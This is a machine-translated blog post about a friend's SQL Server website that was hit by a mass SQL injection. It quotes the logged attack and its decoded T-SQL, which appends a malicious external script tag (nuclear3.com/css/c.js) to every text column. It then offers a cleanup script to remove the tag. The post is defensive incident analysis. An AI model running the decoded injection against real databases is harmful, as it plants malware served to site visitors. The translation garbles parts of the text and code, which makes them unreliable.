In the past few days, the website of a friend has been maliciously injected by people who have been damaged every day. This may be the reason why the program has not been written. Each field in the database has a script (<SCRIPT src = http: // % 63% 2enuclear3.com/css/c.js> </SCRIPT>. The script address may change from time to time ). Search by some search engines:/CSS/C. js> </SCRIPT> and find that many websites have this problem. The injection prototype captured through IIS logs is as follows:
; Declare @ s nvarchar (4000); Set @ s = cast
(Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
400650020005400610062006c0065005f0043007500720073006f007200 as nvarchar (4000); Exec (@ s );--
The preceding SQL statement in cast is decrypted as follows:
Declare @T Varchar(255),@C Varchar(255)
Declare Table_Cursor Cursor For Select A.Name,B.Name From Sysobjects A,Syscolumns B Where A.Id=B.Id And
A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167)
Open Table_Cursor Fetch Next From Table_Cursor Into @T,@C While(@@Fetch_Status=0)
Begin
Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert(Varchar(8000),['+@C+']))+''<Script
Src=http://%63%2Enuclear3.com/css/c.js></Script>''')Fetch Next From Table_Cursor Into @T,@C
End
Close Table_Cursor
Deallocate Table_Cursor
Summary:
It is still the reason why the program is not well written, which will lead to injection. I hope to pay attention to this problem when writing the program in the future, but think about using the DOTNET parameter value, the possibility of injection should be zero.
This friend was most afraid of data loss and hoped to recover the data. So I helped him write an SQL script for clearing fields (only suitable for sqlserver ). Oh, I also hope to facilitate the cleaning of the injected website. The Code is as follows:
Declare @ name as nvarchar (128), @ columnname as nvarchar (128), @ columntype as nvarchar (128), @ injectsql as nvarchar (111)
Set @ injectsql = '<SCRIPT src = http: // % 63% 2enuclear3.com/css/c.js> </SCRIPT>'
Declare curlabel cursor for select name from sysobjects where xtype = 'U'
Open curlabel
Fetch next from curlabel into @ name
While @ fetch_status = 0
Begin
Declare curlabel1 cursor for select column_name, data_type from information_schema.columns where (table_name = @ name)
Open curlabel1
Fetch next from curlabel1 into @ columnname, @ columntype
While @ fetch_status = 0
Begin
If (@ columntype = 'text' or @ columntype = 'text '))
-- Print 1
Begin try
Declare @ primarykey nvarchar (255 );
Select @ primarykey = primarykey from
(Select
C. Name as primarykey,
Case when C. colid in (select IK. colid
From sysindexes I, sysindexkeys Ik, sysobjects oo
Where I. ID = IK. ID and I. indid = IK. indid
And I. Name = oo. Name and OO. xtype = 'pk' -- primary key
And O. ID = I. ID
) Then 1 else 0 end isprimarykey
From sysobjects o inner join syscolumns C on O. ID = C. ID
Where o. xtype = 'U'
And O. Name = @ name) as t where isprimarykey = 1
exec('declare @ptr varbinary(16);declare @id nvarchar(16);declare curText scroll Cursor for select textptr('+@columnName+'),'+@primaryKey+' from '+@name+';declare @Position int,@len int;OPEN curText;FETCH NEXT FROM curText INTO @ptr,@id;WHILE @@FETCH_STATUS=0 BEGIN;select @Position=patindex(''%'+@injectSql+'%'','+@columnName+') from '+@name+' where '+@primaryKey+'=@id;while @Position>0 begin;set @Position=@Position-1;updatetext '+@name+'.'+@columnName+' @ptr @Position @len '''';select @Position=patindex(''%'+@injectSql+'%'','+@columnName+') from '+@name+' where '+@primaryKey+'=@id;end;FETCH NEXT FROM curText INTO @ptr,@id;END;CLOSE curText;DEALLOCATE curText')
END TRY
BEGIN CATCH
print(@name+'.'+@columnName)
END CATCH;
else
if(@columnType='nvarchar' or @columnType='varchar')
exec('update '+@name+' set '+@columnName+'=replace('+@columnName+','''+@injectSql+''','''')')
FETCH NEXT FROM curLabel1 INTO @columnName,@columnType
END
CLOSE curLabel1
DEALLOCATE curLabel1
FETCH NEXT FROM curLabel INTO @name
END
CLOSE curLabel
DEALLOCATE curLabel